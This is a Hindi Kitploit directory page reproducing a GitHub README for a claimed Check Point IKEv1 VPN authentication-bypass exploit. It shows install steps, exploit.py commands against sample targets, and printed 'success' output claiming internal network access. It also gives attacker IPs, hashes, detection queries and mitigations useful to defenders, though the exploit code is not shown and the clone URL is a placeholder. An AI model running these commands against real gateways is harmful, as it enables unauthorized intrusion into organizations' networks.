Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-50751---Check-Point-IKEv1-Authentication-Bypass-Exploit — भेद्यता: रिमोट एक्सेस और मोबाइल एक्सेस में तर्क प्रवाह कमजोरी | Kitploit
उपकरण/GitHubGitHub/fevar54/cve-2026-50751---check-point-ikev1-authentication-bypass-exploit
प्रमाणीकरण और प्राधिकरणभेद्यता स्कैनरभेद्यता विश्लेषणशोषणनेटवर्क सुरक्षापेनिट्रेशन टेस्टिंग
GitHubfevar54/cve-2026-50751---check-point-ikev1-authentication-bypass-exploit

CVE-2026-50751---Check-Point-IKEv1-Authentication-Bypass-Exploit

भेद्यता: रिमोट एक्सेस और मोबाइल एक्सेस में तर्क प्रवाह कमजोरी

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
1373 महीने पहलेअभी तक समीक्षित नहीं

CVE-2026-50751 - Check Point IKEv1 प्रमाणीकरण बायपास शोषण

Security Rating CVSS CISA KEV License Python

⚠️ महत्वपूर्ण चेतावनी

यह कोड केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षणों के लिए है। अनधिकृत उपयोग, स्पष्ट अनुमति के बिना सिस्टम के खिलाफ, अवैध है। लेखक इस उपकरण के दुरुपयोग के लिए जिम्मेदार नहीं है।

📋 विवरण

CVE-2026-50751 Check Point के IKEv1 (पदावनत) प्रोटोकॉल में एक महत्वपूर्ण प्रमाणीकरण बायपास भेद्यता है, जो Remote Access VPN और Mobile Access को प्रभावित करती है। एक अप्रमाणित हमलावर प्रमाणपत्र सत्यापन में एक दोष का शोषण करके वैध पासवर्ड की आवश्यकता के बिना VPN कनेक्शन स्थापित कर सकता है।

तकनीकी विवरण

  • प्रकार: Authentication Bypass (CWE-287)
  • CVSS स्कोर: 9.3 (गंभीर)
  • वेक्टर: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
  • सक्रिय शोषण: हाँ (2026-05-07 से)
  • CISA KEV: जोड़ा गया 2026-06-08, नियत तिथि 2026-06-11

🎯 प्रभावित संस्करण

उत्पादसंस्करण
Security GatewaysR80.40 - R82.10 IKEv1 सक्षम के साथ
Spark FirewallsR80.20.X, R81.10.X, R82.00.X
Mobile AccessIKEv1 के साथ सभी संस्करण

आवश्यक शर्तें

  • ✅ VPN Remote Access या Mobile Access सक्षम
  • ✅ Remote Access के लिए IKEv1 सक्षम
  • ✅ Gateway लीगेसी Remote Access क्लाइंट स्वीकार करता है
  • ✅ मशीन प्रमाणपत्र की आवश्यकता नहीं

🔧 स्थापना

root@kitploit:~
# Clonar repositorio
git clone https://github.com/username/CVE-2026-50751-PoC
cd CVE-2026-50751-PoC

# Instalar dependencias
pip install -r requirements.txt

# Dar permisos de ejecución
chmod +x exploit.py

📦 Dependencias

root@kitploit:~
cryptography>=41.0.0
scapy>=2.5.0
colorama>=0.4.6

🚀 उपयोग

पहचान स्कैन

root@kitploit:~
# Detectar si IKEv1 está habilitado
python3 detector.py -t 192.168.1.1 -p 500

# Escaneo rápido
python3 detector.py -t vpn.target.com -p 4500

शोषण (केवल अधिकृत उपयोग)

root@kitploit:~
# Ejecutar bypass de autenticación
python3 exploit.py -t 192.168.1.1 -p 500

# Con interfaz específica
python3 exploit.py -t vpn.target.com --interface eth0

# Modo verbose
python3 exploit.py -t 192.168.1.1 -p 500 -v

अपेक्षित आउटपुट

root@kitploit:~
╔═══════════════════════════════════════════════════════════════╗
║  CVE-2026-50751 - Check Point IKEv1 Authentication Bypass   ║
║  Critical VPN Authentication Bypass Exploit                 ║
║  CVSS: 9.3 | CISA KEV: 2026-06-08                          ║
╚═══════════════════════════════════════════════════════════════╝

[1] Initiating IKEv1 Main Mode...
[+] Received response - SPI: a1b2c3d4e5f67890
[2] Sending crafted KE + NONCE payloads...
[+] Gateway accepted crafted KE/NONCE - Vulnerability triggered!
[3] Calculating authentication keys...
[4] Sending spoofed authentication...
[+] SUCCESS! Authentication bypassed!
[+] Established IKE SA without valid credentials
[5] Establishing VPN tunnel...
[+] VPN tunnel established!
[+] Internal network access available

[✓] EXPLOIT SUCCESSFUL
[✓] Authentication bypass achieved
[✓] VPN tunnel established
[!] System is VULNERABLE - Apply hotfix immediately

🔍 समझौता का पता लगाना

SmartConsole लॉग में खोजें

root@kitploit:~
# Query para detectar atacantes
action:"Key Install" AND (src:45.77.149.152 OR dst:45.77.149.152)

ज्ञात IOCs

प्रकारमान
हमलावर आईपी45.77.149.152, 209.182.225.136, 38.60.157.139, 162.33.177.101, 45.76.26.42, 144.208.127.155, 38.54.88.201, 38.54.107.167, 66.42.99.200, 45.63.104.106, 45.61.136.173
हैश52fda5c1b9704544f32ee98d9060e689, 51d39aa39478beeac94f2d12f682ecce

🛡️ शमन

विकल्प 1 - हॉटफिक्स लागू करें (अनुशंसित)

संस्करणहॉटफिक्स टेकलिंक
R82.10Take 19डाउनलोड करें
R82Take 103डाउनलोड करें
R81.20Take 141डाउनलोड करें

विकल्प 2 - अस्थायी शमन

  • लीगेसी क्लाइंट अक्षम करें: SmartConsole → Gateway → VPN Clients → Authentication "Allow older clients" को अनचेक करें

  • केवल IKEv2 बलपूर्वक लागू करें: Global Properties → Remote Access → VPN Authentication "IKEv2 only" चुनें

  • मशीन प्रमाणपत्र अनिवार्य करें: VPN Clients → Authentication → Machine Certificate Authentication "Mandatory" के रूप में सेट करें

📚 संदर्भ

  • NVD - CVE-2026-50751
  • Check Point SK185033
  • CISA Known Exploited Vulnerabilities
  • Blog Post - Check Point Research

📊 समयरेखा

तिथिघटना
2026-05-07पहला शोषण देखा गया
2026-06-04Check Point जांच शुरू करता है
2026-06-08CVE प्रकाशित, CISA KEV में जोड़ता है
2026-06-11पैच करने के लिए CISA की अंतिम तिथि

⚖️ अस्वीकरण

यह सॉफ्टवेयर "जैसा है" प्रदान किया जाता है, बिना किसी प्रकार की वारंटी के। लेखक इस उपकरण के दुरुपयोग के लिए जिम्मेदार नहीं है। इसका उपयोग केवल उन सिस्टम पर करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति है।

📞 संपर्क

  • GitHub पर एक issue खोलें
  • संपर्क: [email protected]

🌟 श्रेय

  • Check Point Research - खोज और विश्लेषण के लिए
  • CISA - समन्वय और प्रसार के लिए
  • सुरक्षा समुदाय - त्वरित प्रतिक्रिया के लिए

⭐ यदि यह PoC आपके लिए उपयोगी था, तो रिपॉजिटरी को एक स्टार देने पर विचार करें

text

📄 लाइसेंस (GPLv3)

📦 requirements.txt

root@kitploit:~
cryptography>=41.0.0
scapy>=2.5.0
colorama>=0.4.6

⚠️ GitHub के लिए महत्वपूर्ण नोट:

टूल डाउनलोड करें